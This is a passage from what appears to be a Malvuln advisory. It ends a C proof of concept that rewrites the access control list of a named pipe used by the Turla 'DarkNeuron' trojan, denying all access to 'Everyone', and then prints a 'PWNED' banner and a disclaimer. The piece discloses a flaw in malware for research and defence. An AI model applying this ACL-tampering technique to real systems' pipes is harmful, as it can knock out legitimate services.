TRUSTEE_IS_NAME; trustee[0].TrusteeType = TRUSTEE_IS_GROUP; trustee[0].ptstrName = TEXT("Everyone"); trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE; trustee[0].pMultipleTrustee = NULL; EXPLICIT_ACCESS explicit_access_list[1]; ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS)); explicit_access_list[0].grfAccessMode = DENY_ACCESS; explicit_access_list[0].grfAccessPermissions = GENERIC_ALL; explicit_access_list[0].grfInheritance = NO_INHERITANCE; explicit_access_list[0].Trustee = trustee[0]; if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){ printf("%d", GetLastError()); return 1; } if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){ printf("%d", GetLastError()); return 1; }else{ printf("Trojan.Win32.DarkNeuron.gen (Turla Group) PWNED!\n"); printf("By Malvuln\n"); printf("Nov of 2022\n"); } LocalFree(pNewDACL); LocalFree(pOldDACL); CloseHandle(hPipe); system("pause"); return 0; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>